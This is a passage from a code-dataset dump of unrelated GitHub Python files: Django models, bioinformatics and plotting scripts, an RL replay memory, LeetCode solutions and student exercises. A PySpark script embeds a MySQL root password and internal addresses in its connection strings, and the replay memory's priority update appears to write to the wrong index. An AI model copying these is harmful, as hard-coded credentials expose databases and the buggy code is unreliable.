'',\n    url(r'^us/$',\n 
ContactFormView.as_view(),\n name='contact'),\n url(r'^sent/$',\n TemplateView.as_view(template_name='sent.html'),\n name='sent'),\n)\n","repo_name":"wbtuomela/fundus","sub_path":"dico/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23307616485","text":"from django.db import models\nfrom users.models import CustomUser\nclass Exam(models.Model):\n user =models.ForeignKey(CustomUser,on_delete=models.CASCADE, related_name=\"exams\")\n name = models.CharField(max_length=200, blank=True, null=True)\n\nclass Section(models.Model):\n name = models.CharField(max_length=200, blank=True, null=True)\n exam = models.ForeignKey(Exam,on_delete=models.CASCADE, related_name=\"sections\")\n\nclass Topic(models.Model):\n name = models.CharField(max_length=200, blank=True, null=True)\n section = models.ForeignKey(Section,on_delete=models.CASCADE, related_name=\"topics\")\n\nclass Quiz(models.Model):\n name = models.CharField(max_length=200, blank=True, null=True)\n topic = models.ForeignKey(Topic,on_delete=models.CASCADE, related_name=\"quizes\")\n\n\nclass Question(models.Model):\n quiz = models.ForeignKey(Quiz,on_delete=models.CASCADE, related_name=\"questions\")\n question = models.TextField(null=True, blank = True)\n image = models.ImageField(upload_to='quiz_images/', blank=True, null=True)\n option_1 = models.CharField(max_length=200)\n option_2 = models.CharField(max_length=200)\n option_3 = models.CharField(max_length=200)\n option_4 = models.CharField(max_length=200)\n correct_ans = models.CharField(max_length=200)\n\nclass Result(models.Model):\n student = models.ForeignKey(CustomUser,on_delete=models.CASCADE, related_name=\"all_results\")\n quiz = models.ForeignKey(Quiz,on_delete=models.CASCADE, related_name=\"quiz_results\")\n correct_answers_count = models.IntegerField(default=0,null=True,blank=True)\n wrong_answers_count = models.IntegerField(default=0,null=True,blank=True)\n not_answered_count = models.IntegerField(default=0,null=True,blank=True)\n\nclass Answer(models.Model):\n result = models.ForeignKey(Result,on_delete=models.CASCADE, related_name=\"answers\")\n question = models.ForeignKey(Question,on_delete=models.CASCADE, related_name=\"all_answers\", blank=True, null=True)\n given_ans = models.CharField(max_length=200)\n","repo_name":"kushagr-Nandan/smilebots-assessment","sub_path":"smilebot/quizing/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"25019120989","text":"import PythonFileLibrary.SettingParser\n\n\"\"\"\n SettingParser.py\n\n Parses setup.txt for library name, the directory of the files you want to scan, and\n the output directory of BuiltInVariables.txt.\n\"\"\"\nclass SettingParser(PythonFileLibrary.SettingParser.SettingParser):\n def __init__(self):\n super().__init__()\n self.libraryName = \"\"\n self.libraryDirectory = \"\"\n self.outputDirectory = \"\"\n\n try:\n self.Parse()\n except AssertionError as error:\n print(error)\n\n # Parse setup.txt. 
Will throw an AssertionError if the\n # file cannot be read.\n def Parse(self):\n assert self.canParse, \"SettingParser.py: Could not parse setup.txt.\"\n\n currentSetting = 0\n for line in self.GetSettings():\n currentSetting += 1\n\n if currentSetting == 1:\n self.libraryName = self.GetNextLine().strip()\n\n if currentSetting == 2:\n self.libraryDirectory = self.GetNextLine().strip()\n\n if currentSetting == 3:\n self.outputDirectory = self.GetNextLine().strip()\n\n self.ResetReader()\n","repo_name":"jghsrobotics/RobotCDocs","sub_path":"RobotCDocs/SettingParser.py","file_name":"SettingParser.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19508779775","text":"def FindClumps(text, k, L, t):\r\n '''\r\n A function to find clumps of k-mer in specific window within Genome to shed light \r\n on the location of Ori\r\n INPUT:\r\n text - the genome as string\r\n k - the length of k-mer we're looking for\r\n L - the length of the window\r\n t - the window must have at least t-number of k-mer repetition to be considered\r\n OUTPUT:\r\n patterns - a list of possible k-mers\r\n\r\n '''\r\n patterns =[]\r\n length = len(text)\r\n # scanning the genome by window length\r\n for sub_text in range(0,length-L):\r\n window = text[sub_text:sub_text+L]\r\n freqMap = FrequencyTable(window, k)\r\n for pattern in freqMap.keys():\r\n if freqMap[pattern] >= t:\r\n patterns.append(pattern)\r\n # remove dublications\r\n patterns = list(set(patterns))\r\n return patterns","repo_name":"EsraaK-009/DNA_hidden_messages","sub_path":"Find_clumps.py","file_name":"Find_clumps.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"28777397997","text":"# Import the necessary modules\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\n# Initialize the lists for X and Y\nmediumCSTree = pd.read_csv('./dataForPlots/TreeDepth.csv')\ndfMT = pd.DataFrame(mediumCSTree)\n\n# ax = plt.subplot(3,2,3, figsize=(15, 15))\nplt.plot(dfMT['Domlock'], color='#ed553b', label='Domlock', marker='d')\nplt.plot(dfMT['Intention Lock'], color='#f6d55c', label='Intention Lock', marker='s')\nplt.plot(dfMT['CALock'], color='#173f5f', label='CALock', marker='+')\nplt.xticks([0, 1, 2, 3, 4, 5, 6, 7], ['9', '10', '11', '12', '13', '14', '15', '16'])\nplt.xlabel(\"Depth of hierarchy\")\nplt.ylabel(\"Execution time(Log Scale)\")\nplt.legend()\n\nplt.savefig('./DepthOfTree.png')\n","repo_name":"ayushpandey8439/CALockBench","sub_path":"StressTest/DepthTree.py","file_name":"DepthTree.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35592714753","text":"import argparse\nimport copy\nfrom collections import namedtuple\nfrom typing import List\n\nimport numpy as np\n\nfrom utilities.segment_tree import SumSegmentTree\n\n# Definition of observation:\n# state: s_t\n# action: a_t\n# reward: r_(t+1) (reward received due to being at state s_t and performing action a_t which transitions to state\n# s_(t+1))\n# terminal: t_(t+1) (whether or not the next state is a terminal state)\nslim_observation = namedtuple('slim_observation', 'state, action, reward, terminal, valid_observation, success')\nobservation = namedtuple('observation', 'state, action, reward, terminal, next_state, index_in_memory')\n\n\nclass ReplayMemory(object):\n def __init__(self, params: 
argparse) -> None:\n self.params = params\n self.memory_size = params.replay_memory_size\n self.success_memory_size = int(self.memory_size * 0.1) # 10% of the size of the main memory.\n self.batch_size = params.batch_size\n self.hist_len = params.hist_len\n self.memory: List[slim_observation] = [None for _ in range(self.memory_size)]\n self.success_memory: List[slim_observation] = None\n self.elements_in_memory = 0\n self.insert_index = 0\n self.step = 0\n\n # Success memory will only contain trajectories which lead to a successful finish of the task.\n if self.params.success_replay_memory:\n self.success_memory: List[slim_observation] = [None for _ in range(self.success_memory_size)]\n self.maximal_success_trajectory = 10 # For trajectories longer, we will keep only the last X steps.\n self.elements_in_success_memory = 0\n self.success_insert_index = 0\n\n # Prioritized ER parameters.\n if self.params.prioritized_experience_replay:\n self.epsilon = 0.01\n self.alpha = 0.6\n it_capacity = 1\n while it_capacity < self.memory_size:\n it_capacity *= 2\n self._it_sum = SumSegmentTree(it_capacity)\n self._max_priority = 1.0\n\n def add_observation(self, state: object, action: int, reward: float, terminal: int,\n valid_observation: bool, success: bool) -> None:\n self.memory[self.insert_index] = slim_observation(state=state, action=action, reward=reward, terminal=terminal,\n valid_observation=valid_observation,\n success=success)\n\n if self.params.prioritized_experience_replay:\n # Update values in Sum and Min trees (Prioritized ER). To ensure all observations are sampled at least once,\n # they are initially set to maximal priority.\n priority = (self._max_priority + self.epsilon) ** self.alpha\n if self.insert_index < self.params.hist_len:\n # We want to make sure that the minimal sampled index will be hist_len to ensure we can build a full\n # state.\n priority = 0.0\n self._it_sum[self.insert_index] = priority\n\n if success and self.params.success_replay_memory:\n # Find trajectory start index\n trajectory_length = 0\n while trajectory_length < self.maximal_success_trajectory and \\\n (self.insert_index - trajectory_length) > 0 and \\\n self.memory[self.insert_index - trajectory_length - 1].terminal != 1:\n trajectory_length += 1\n\n for idx in reversed(range(trajectory_length)):\n self.success_memory[self.success_insert_index] = copy.deepcopy(self.memory[self.insert_index - idx])\n self.elements_in_success_memory = min(self.elements_in_success_memory + 1, self.success_memory_size)\n self.success_insert_index = (self.success_insert_index + 1) % self.success_memory_size\n\n self.elements_in_memory = min(self.elements_in_memory + 1, self.memory_size)\n self.insert_index = (self.insert_index + 1) % self.memory_size\n\n def _sample_proportional(self, batch_size) -> List[int]:\n res = []\n for _ in range(batch_size):\n mass = np.random.random() * self._it_sum.sum(0, self.elements_in_memory - 1)\n idx = self._it_sum.find_prefixsum_idx(mass)\n res.append(idx)\n return res\n\n def sample(self):\n # Returns: Tuple[states, actions, rewards, termination values, next states, indices]\n mini_batch = []\n self.step += 1\n\n if self.params.prioritized_experience_replay:\n training_samples = self._sample_proportional(self.batch_size)\n else:\n training_samples = np.random.randint(low=(self.params.hist_len - 1), high=(self.elements_in_memory - 1),\n size=self.batch_size)\n for index in range(self.batch_size):\n\n # Calculate probability of sampling from success replay memory.\n if self.params.srm_decay == 
0:\n success_sample_probability = self.params.srm_end\n else:\n success_sample_probability = self.params.srm_start * (1 - min(1, self.step * 1.0 /\n self.params.srm_decay)) \\\n + self.params.srm_end * min(1, self.step * 1.0 / self.params.srm_decay)\n\n if not self.params.success_replay_memory or np.random.rand() > success_sample_probability or \\\n self.elements_in_success_memory < self.params.hist_len:\n memory = self.memory\n\n while not memory[training_samples[index]].valid_observation or \\\n training_samples[index] < self.params.hist_len:\n # Invalid observations are for instance states in which we terminate due to timeout.\n # We do not learn from termination states due to timeout. Timeout is an artificial addition to make\n # sure episodes end and the train/test procedure continues.\n # Also make sure all samples are in the range [self.params.hist_len, self.elements_in_memory - 1]\n # to ensure that we can always build the first state and the next state.\n if self.params.prioritized_experience_replay:\n training_samples[index] = self._sample_proportional(1)[0]\n else:\n training_samples[index] = np.random.randint(low=(self.params.hist_len - 1),\n high=(self.elements_in_memory - 1), size=1)\n\n sample_index = training_samples[index]\n else:\n memory = self.success_memory\n training_samples[index] = -1\n sample_index = np.random.randint(low=(self.params.hist_len - 1),\n high=(self.elements_in_success_memory - 1))\n while not memory[sample_index].valid_observation:\n sample_index = np.random.randint(low=(self.params.hist_len - 1),\n high=(self.elements_in_success_memory - 1))\n\n obs = memory[sample_index]\n state = self._build_state(sample_index, memory)\n if obs.terminal != 1: # 1 means True.\n next_state = self._build_state(sample_index + 1, memory)\n else:\n # Instead of trying to infer state size, just return a state. 
The terminal flag denotes to disregard\n # this 'next_state' object.\n next_state = state\n\n mini_batch.append(observation(state=state, action=obs.action, reward=obs.reward, terminal=obs.terminal,\n next_state=next_state, index_in_memory=training_samples[index]))\n\n return zip(*mini_batch)\n\n def _build_state(self, final_index: int, memory) -> np.ndarray:\n state = []\n # Final observation should be added prior to the loop, to ensure proper state buildup.\n state.insert(0, memory[final_index].state)\n saw_terminal = False\n for i in range(1, self.params.hist_len):\n # Once we encounter a terminal state, this means we are wrapping around to a previous trajectory.\n # States are start-zero-padded given they are the start of the trajectory.\n if memory[final_index - i].terminal:\n saw_terminal = True\n\n if saw_terminal:\n state.insert(0, np.zeros_like(memory[final_index].state))\n else:\n state.insert(0, memory[final_index - i].state)\n\n return np.array(state)\n\n def update_priorities(self, indices: List[int], priorities: List[float]) -> None:\n assert len(indices) == len(priorities)\n for idx, priority in zip(indices, priorities):\n if idx >= 0: # idx = -1 means sampled from the success ER.\n assert priority >= 0\n assert 0 <= idx < self.elements_in_memory\n self._it_sum[self.insert_index] = (priority + self.epsilon) ** self.alpha\n\n self._max_priority = max(self._max_priority, priority)\n\n def size(self) -> int:\n return self.elements_in_memory\n\n\nclass ParallelReplayMemory(ReplayMemory):\n \"\"\"\n Parallel replay memory stores a running trajectory of observations for each running agent.\n Once the agent has finished, it will inject the trajectory into the shared replay memory.\n \"\"\"\n def __init__(self, params: argparse) -> None:\n super(ParallelReplayMemory, self).__init__(params)\n\n self.agents_observations: List[List[slim_observation]] = None\n self._reset_agents_observations()\n\n def _reset_agents_observations(self):\n self.agents_observations = [[] for _ in range(self.params.number_of_agents)]\n\n def add_observation(self, state, action: List[int], reward: List[float], terminal: List[bool],\n valid_observation: List[bool], success: List[bool]) -> None:\n agents_still_playing = False\n for idx, r in enumerate(reward):\n if r is not None and terminal[idx] is not None:\n if not terminal[idx]:\n agents_still_playing = True\n self.agents_observations[idx].append(\n slim_observation(state=state[idx], action=action[idx], reward=reward[idx],\n terminal=int(terminal[idx]), valid_observation=valid_observation[idx],\n success=success[idx]))\n\n # Once all agents have finished playing, insert all trajectories one after the other into the replay memory.\n # This behavior keeps our observations synced properly whilst allowing for multiple instances at once.\n if not agents_still_playing:\n for agent_idx in range(self.params.number_of_agents):\n for _slim_observation in self.agents_observations[agent_idx]:\n super(ParallelReplayMemory, self).add_observation(_slim_observation.state, _slim_observation.action,\n _slim_observation.reward,\n _slim_observation.terminal,\n _slim_observation.valid_observation,\n _slim_observation.success)\n self._reset_agents_observations()\n","repo_name":"tesslerc/malmo_rl","sub_path":"utilities/replay_memory.py","file_name":"replay_memory.py","file_ext":"py","file_size_in_byte":11701,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"6905363123","text":"# -*- coding: utf-8 
-*-\n\n\n\"\"\"\n\n在192.168.37.28 bigdata8上执行\n将数据按照年合并\n报错:\npy4j.protocol.Py4JJavaError: An error occurred while calling o361.jdbc. : scala.MatchError: null\n\n1. pyspark 写入MySQL报错 An error occurred while calling o45.jdbc.: scala.MatchError: null 解决方案\nhttps://blog.csdn.net/helloxiaozhe/article/details/81033767\n\n时间:2019年7月3日\n在bigdata7上提交任务:\n\nnohup spark-submit --master yarn /root/lulu/Workspace/swt/Merge_Data_linux.py &\n\n查看任务执行状态\nyarn application -list\n\nspark-submit --master yarn --deploy-mode client --num-executors 10 --executors-cores 2 mnistOnSpark.py\n\nnohup spark-submit --master yarn --deploy-mode client --num-executors 6 --executor-cores 2 --executor-memory 4g /root/lulu/Workspace/swt/Merge_Data_linux.py &\n\n\n\"\"\"\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import *\n\n\nspark = SparkSession\\\n .builder\\\n .appName(\"merge data\")\\\n .getOrCreate()\n\nds_tables = spark.read.format('jdbc').\\\n options(url='jdbc:mysql://10.20.5.49:3306/',\n dbtable='information_schema.tables',\n user='root',\n password='BigData@2018',\n driver='com.mysql.jdbc.Driver').\\\n load().\\\n filter(\"table_schema = 'swt_tradewar'\").\\\n select(\"TABLE_NAME\").filter(col(\"TABLE_NAME\").startswith(\"b_data_\"))\n\nlist_tables = list(ds_tables.rdd.map(lambda x:x.TABLE_NAME).collect())\n\n# list_tables = filter(lambda x:str(x).startswith(\"b_data_2017\"),list_tables)\n\nurl = \"jdbc:mysql://10.20.5.49:3306/swt_tradewar?useUnicode=true&characterEncoding=UTF-8&user=root&password=BigData@2018\"\n\nds_company_code = spark.read.jdbc(url=url,table=\"ut_company_code\").select(\"CODE\",\"NAME\").withColumnRenamed(\"NAME\",\"COMPANYNAME\")\nds_consign_code = spark.read.jdbc(url=url,table=\"ut_consign_code\").select(\"CODE\",\"NAME\").withColumnRenamed(\"NAME\",\"CONSIGN\")\nds_country_code = spark.read.jdbc(url=url,table=\"ut_country_code\").select(\"CODE\",\"NAME\").withColumnRenamed(\"NAME\",\"COUNTRY\")\nds_cust_code = spark.read.jdbc(url=url,table=\"ut_cust_code\").select(\"CODE\",\"NAME\").withColumnRenamed(\"NAME\",\"CUST\")\nds_hs_code = spark.read.jdbc(url=url,table=\"ut_hs_code\").select(\"CODE\",\"NAME\").withColumnRenamed(\"NAME\",\"COMMODITIES\")\nds_trade_code = spark.read.jdbc(url=url,table=\"ut_trade_code\").select(\"CODE\",\"NAME\").withColumnRenamed(\"NAME\",\"TRADE\")\nds_transport_code = spark.read.jdbc(url=url,table=\"ut_transport_code\").select(\"CODE\",\"NAME\").withColumnRenamed(\"NAME\",\"TRANSPORT\")\n\n# 企业名、主要商品、计量单位、货源地(出口)/境内目的地(进口)、贸易方式、国别、进出口关区、运输方式、当月数量、累计数量、当月美元、累计美元、当月rmb、累计rmb\ncol_name = [\"COMPANYNAME\", \"COMMODITIES\", \"UNITCODE\", \"CONSIGN\", \"TRADE\", \"COUNTRY\", \"CUST\", \"TRANSPORT\", \"QUNT\",\n \"SUMQ\", \"USD\", \"SUMM\", \"RMB\", \"RMBSUMM\",\n \"COMPANYCODE\",\"HSCODE\",\"CONSIGNCODE\",\"TRADECODE\",\"COUNTRYCODE\",\"CUSTCODE\",\"TRANSPORTCODE\"]\n\nfor db_table in list_tables:\n print(db_table+\" start!\")\n type = str(db_table).split(\"_\")[3]\n time = str(db_table).split(\"_\")[2]\n year = str(time[0:4])\n month = str(time[4:6])\n ds = spark.read.jdbc(url=url, table=db_table)\n ds1 = ds.join(ds_company_code, ds.COMPANYCODE == ds_company_code.CODE, \"inner\").drop(\"CODE\")#.drop(\"COMPANYCODE\")\n ds2 = ds1.join(ds_hs_code, ds1.HSCODE == ds_hs_code.CODE, \"inner\").drop(\"CODE\")#.drop(\"HSCODE\")\n ds3 = ds2.join(ds_consign_code, ds2.CONSIGNCODE == ds_consign_code.CODE, \"inner\").drop(\"CODE\")#.drop(\"CONSIGNCODE\")\n ds4 = ds3.join(ds_trade_code, ds3.TRADECODE == ds_trade_code.CODE, 
\"inner\").drop(\"CODE\")#.drop(\"TRADECODE\")\n ds5 = ds4.join(ds_country_code, ds4.COUNTRYCODE == ds_country_code.CODE, \"inner\").drop(\"CODE\")#.drop(\"COUNTRYCODE\")\n ds6 = ds5.join(ds_cust_code, ds5.CUSTCODE == ds_cust_code.CODE, \"inner\").drop(\"CODE\")#.drop(\"CUSTCODE\")\n ds7 = ds6.join(ds_transport_code, ds6.TRANSPORTCODE == ds_transport_code.CODE, \"inner\").drop(\"CODE\")#.drop(\"TRANSPORTCODE\")\n ds8 = ds7.select(col_name).withColumn(\"TIME\", lit(time)).withColumn(\"YEAR\", lit(year)).withColumn(\"MONTH\", lit(month))\n if type == \"e\":\n # ds8.coalesce(25).write.mode(\"append\").jdbc(url=url, table=\"data_export\") # 在bigdata8运行出错代码\n ds8.coalesce(25).write.jdbc(mode=\"append\", url=url,table=\"data_export\", properties={\"driver\": 'com.mysql.jdbc.Driver'})\n # ds8.coalesce(15).write.jdbc(mode=\"append\", url=url,table=\"data_export_\" + year, properties={\"driver\": 'com.mysql.jdbc.Driver'})\n print(db_table + \" finish!\")\n if type == \"i\":\n # ds8.coalesce(25).write.mode(\"append\").jdbc(url=url, table=\"data_import\") # 在bigdata8运行出错代码\n ds8.coalesce(25).write.jdbc(mode=\"append\", url=url,table=\"data_import\", properties={\"driver\": 'com.mysql.jdbc.Driver'})\n # ds8.coalesce(15).write.jdbc(mode=\"append\", url=url,table=\"data_import_\" + year, properties={\"driver\": 'com.mysql.jdbc.Driver'})\n print(db_table + \" finish!\")\n\n\n\nspark.stop()","repo_name":"sunshinelu/PythonDiary","sub_path":"Project/SWT/TradeWar/Merge_Data_linux.py","file_name":"Merge_Data_linux.py","file_ext":"py","file_size_in_byte":5080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"914318816","text":"'''\r\n汇总区间,给定一个无重复元素的有序整数数组,给出一些个区间刚好覆盖连续的元素\r\n\r\n思路:\r\n依次遍历即可\r\n输入:nums = [0,1,2,4,5,7]\r\n输出:[\"0->2\",\"4->5\",\"7\"]\r\n'''\r\n\r\ndef summaryRanges(nums):\r\n # 看清题目中是否说的是非空数组,否则要先进行判断,防止超出下标\r\n l = len(nums)\r\n if l == 0:\r\n return []\r\n\r\n first_ele = nums[0]\r\n ss = []\r\n for i in range(1, l):\r\n if nums[i] - nums[i-1] > 1:\r\n if first_ele == nums[i-1] or first_ele == nums[i]: # 第一个元素是单个区间或者最后一个元素是单个区间的情况\r\n s = str(nums[i-1])\r\n else:\r\n s = str(first_ele) + '->' + str(nums[i-1])\r\n ss.append(s)\r\n first_ele = nums[i]\r\n # 处理最后几个元素\r\n if nums[l-1] != first_ele:\r\n s = str(first_ele) + '->' + str(nums[l-1])\r\n else:\r\n s = str(nums[l-1])\r\n ss.append(s)\r\n return ss\r\n\r\nnums = []\r\nprint(summaryRanges(nums))","repo_name":"zhang-yujie/Leetcode_record","sub_path":"Array/Seventh_day/Q228.py","file_name":"Q228.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"70078650078","text":"\"\"\"\nGiven an n-ary tree, return the level order traversal of its nodes' values. 
(ie, from left to right, level by level).\n\nFor example, given a 3-ary tree:\n\nWe should return its level order traversal:\n\n[\n     [1],\n     [3,2,4],\n     [5,6]\n]\n\n\"\"\"\n\n\n# # Definition for a Node.\n# class Node:\n#     def __init__(self, val, children):\n#         self.val = val\n#         self.children = children\n\n\n\"\"\"\nTime Complexity: O(n)\nSpace Complexity: O(n)\n\"\"\"\n\n\nfrom collections import deque\n\n\nclass Solution:\n    def levelOrder(self, root: 'Node') -> List[List[int]]:\n        if root is None:\n            return []\n\n        q = deque([root])\n        results = []\n        while q:\n            results.append([item.val for item in q])\n            len_q = len(q)\n            for _ in range(len_q):\n                node = q.popleft()\n                for child in node.children:\n                    q.append(child)\n\n        return results\n","repo_name":"hz336/Algorithm","sub_path":"LeetCode/BFS/E N-ary Tree Level Order Traversal.py","file_name":"E N-ary Tree Level Order Traversal.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"21728347068","text":"import matplotlib.pyplot as plt\nimport matplotlib.style as style\nimport io\nimport base64\nimport numpy as np\n\n\ndef build_graph(source, avgscore):\n    style.use('fivethirtyeight')\n    plt.locator_params(integer=True)\n    img = io.BytesIO()\n    plt.tight_layout()\n    plt.bar(source, avgscore, color='m')\n    plt.xlabel('Source')\n    plt.ylabel('Average Score Given')\n    plt.title(\"Average Score Given per Source\")\n    plt.tight_layout()\n    plt.ylim((0, 10))\n    plt.savefig(img, format='png')\n    img.seek(0)\n    graph_url = base64.b64encode(img.getvalue()).decode()\n    plt.close()\n    return 'data:image/png;base64,{}'.format(graph_url)\n","repo_name":"leestanley/Sachacks-2018-rebias","sub_path":"plottest/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"24669593428","text":"import datetime\n\ndef get_members():\n    members = [[543, 'Eve', '1989-06-26'], [544, 'Alice', '1990-03-26'], [545, 'Bob','2001-09-15'], [546, 'Charlie', '1985-10-22'], [545, 'Ivan', '1987-04-09'], [546, 'Gerth', '1990-08-14'], [543, 'Leo', '1993-09-3'], [544, 'Hudson', '1984-11-08'], [545, 'Dylan', '1983-05-13'], [546, 'Ezra', '1992-01-27'], [545, 'Thomas', '1987-07-19'], [546, 'Charles', '1989-12-16'],[545, 'Maverick', '2003-02-25'], [546, 'Elias','1987-04-25']]\n    return members\n\ndef sort_members(members):\n    return sorted(members, key=lambda x: x[2])\n\ndef get_enterprise(members):\n    days=[]\n    date=[]\n    for i in range(len(members)):\n        days.append(datetime.datetime.strptime(members[i][2], '%Y-%m-%d').day)\n    for i in range(len(days)):\n        if days[i] > 1:\n            for j in range(2,days[i]):\n                if (days[i] % j) == 0:\n                    days[i] = False\n                    break\n    for k in range(len(members)):\n        if days[k] != False:\n            date.append(members[k])\n    return date\n\ndef get_managers(members):\n    bday=[]\n    name=[]\n    final=[]\n    for i in range(len(members)):\n        bday.append(datetime.datetime.strptime(members[i][2], '%Y-%m-%d').day)\n        name.append(members[i][1])\n    for i in range(len(members)):\n        if len(name[i]) <= 6:\n            name[i] = False\n        if (members[i][0]%2 == 0 or bday[i]%2 != 0):\n            bday[i] = False\n    for k in range(len(members)):\n        if (name[k] != False or bday[k] != False):\n            final.append(members[k])\n    return final\n\nif __name__ == \"__main__\":\n    members = get_members()\n    membersSorted = sort_members(members)\n    print(membersSorted)\n    enterprise = get_enterprise(membersSorted)\n    print(enterprise)\n    managers = get_managers(membersSorted)\n    print(managers)","repo_name":"avrilalphonse/Ametros-Learning","sub_path":"meetingWithPolina.py","file_name":"meetingWithPolina.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"24965278222","text":"import numpy as np\nimport torch\nfrom utils import FileWriter\nfrom collections.abc import Iterable\n\n\nclass MeasureCollector:\n    def __init__(self, measures, similarities, number_of_layers, path):\n        self._determine_all_measures(measures, similarities, number_of_layers)\n        self.file = FileWriter(path, \",\".join(self.measure_headers))\n\n        self.current_id = -1\n        self.results = []\n\n\n    def _determine_all_measures(self, measures, similarities, number_of_layers):\n        # Determine network similarity measures\n        sim_measures = [*filter(lambda x: 'sim' in x, measures)]\n        non_sim_measures = [*filter(lambda x: 'sim' not in x, measures)]\n\n        for i, measure in enumerate(sim_measures):\n            sim_measures[i] = [*map(lambda sim: f'{measure}_{sim}', similarities)]\n\n        sim_measures = np.ravel(sim_measures)\n        \n        self.measures = [*non_sim_measures, *sim_measures]\n\n        # Determine per_layer similarity measures\n        sim_pl_measures = [*filter(lambda x: 'sim_pl' in x, self.measures)]\n        non_sim_pl_measures = [*filter(lambda x: 'sim_pl' not in x, self.measures)]\n\n        for i, measure in enumerate(sim_pl_measures):\n            sim_pl_measures[i] = [*map(lambda layer_idx: f'{measure}_{layer_idx}', range(number_of_layers))]\n\n        sim_pl_measures = np.ravel(sim_pl_measures)\n        \n        self.measure_headers = [*non_sim_pl_measures, *sim_pl_measures]\n\n        # Determine std's and means for number sets\n        at_measures = [*filter(lambda x: '@' in x, self.measure_headers)]\n        non_at_measures = [*filter(lambda x: '@' not in x, self.measure_headers)]\n\n        for i, measure in enumerate(at_measures):\n            at_measures[i] = [*map(lambda op: f'{measure}_{op}', ['mean','std'])]\n\n        at_measures = np.ravel(at_measures)\n\n        self.measure_headers = [*non_at_measures, *at_measures]\n\n\n    def next(self):\n        self.current_id += 1\n\n        if self.current_id >= len(self.measures):\n            self.current_id = -1\n            return None\n\n        return self.measures[self.current_id]\n    \n\n    def add(self, data):\n        if type(data) == dict:\n            for value in data.values():\n                if isinstance(value, torch.Tensor): value = value.numpy()\n                self.results.append(np.mean(value))\n                self.results.append(np.std(value))\n        elif isinstance(data, Iterable):\n            if isinstance(data, torch.Tensor): data = data.numpy()\n            self.results.append(np.mean(data))\n            self.results.append(np.std(data))\n        else:\n            self.results.append(data)\n\n\n    def write(self):\n        for i, result in enumerate(self.results): self.results[i] = str(result)\n\n        self.file(\",\".join(self.results))\n        self.results = []\n\n","repo_name":"peterddod/masters-experiment-software","sub_path":"src/MeasureCollector.py","file_name":"MeasureCollector.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36046714329","text":"#3.7\r\na = int(input('Введите значение: '))\r\nb = int(input('Введите значение: '))\r\nc = int(input('Введите значение: '))\r\nprint(a+b)\r\nif (a+b)>c and (b+c)>a and (c+a)>b:\r\n    print('Yes')\r\nelse: print('No')\r\n\r\n#3.8\r\nmyyear=int(input('Введите год: '))\r\nif ((myyear%4==0) and (myyear%100!=0)) or (myyear%400==0):\r\n    print(\"Високосный\")\r\nelse: print(\"Обычный\")\r\n\r\n#3.10\r\nstr1 = input(\"Введите номер: \")\r\nif len(str1)%2:\r\n    print(\"No\")\r\nif len(str1)==2:\r\n    if int(str1[0])==int(str1[1]):\r\n        print(\"Yes\")\r\n    else: print(\"No\")\r\nif len(str1)==4:\r\n    if (int(str1[0])+int(str1[1]))==(int(str1[2])+int(str1[3])):\r\n        print(\"Yes\")\r\n    else: print(\"No\")\r\nif len(str1)==6:\r\n    if (int(str1[0])+int(str1[1])+int(str1[2]))==(int(str1[3])+int(str1[4])+int(str1[5])):\r\n        print(\"Yes\")\r\n    else: print (\"No\")\r\n\r\n#4.1\r\nm = '''1. Введение в Python\r\n2. Строки и списки\r\n3. Условные операторы\r\n4. Циклы\r\n5. Словари, кортежи и множества\r\n6. Выход'''\r\nchunks = m.split('\\n')\r\na = int(input(\"Введите номер: \"))\r\nif (int(chunks.index(chunks[0])) + 1) == a:\r\n    print(chunks[0])\r\nelif (int(chunks.index(chunks[1])) + 1) == a:\r\n    print(chunks[1])\r\nelif (int(chunks.index(chunks[2])) + 1) == a:\r\n    print(chunks[2])\r\nelif (int(chunks.index(chunks[3])) + 1) == a:\r\n    print(chunks[3])\r\nelif (int(chunks.index(chunks[4])) + 1) == a:\r\n    print(chunks[4])\r\nelif (int(chunks.index(chunks[5])) + 1) == a:\r\n    print(chunks[5])\r\n","repo_name":"mbln3000/1SemHW","sub_path":"task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"24812892417","text":"#!/usr/bin/env python\n\nimport geotf\nimport roscpp_initializer\nimport time\nimport numpy as np\nimport rospy\n\n\"\"\" \n    Example of how to use geotf (copied from geotf Cpp library)\n    - Lunch using demo_python.launch\n    \n\n    Read frame configuration from rosparams.\n    Configred Geo frames in that launch file:\n     - ENU_LEE: Enu frame with origin on the LEE terasse at ETH\n     - GPS: WGS84 GPS frame (so x=lon, y = lat, z = alt)\n     - UTM: UTM 32 North frame (x = easting, y = northing, z = altitude)\n     - CH1903+: Swissgrid based on new CH1903+ coordinates and Landesvermessung 95.\n\"\"\"\n\nif __name__ == \"__main__\":\n\n    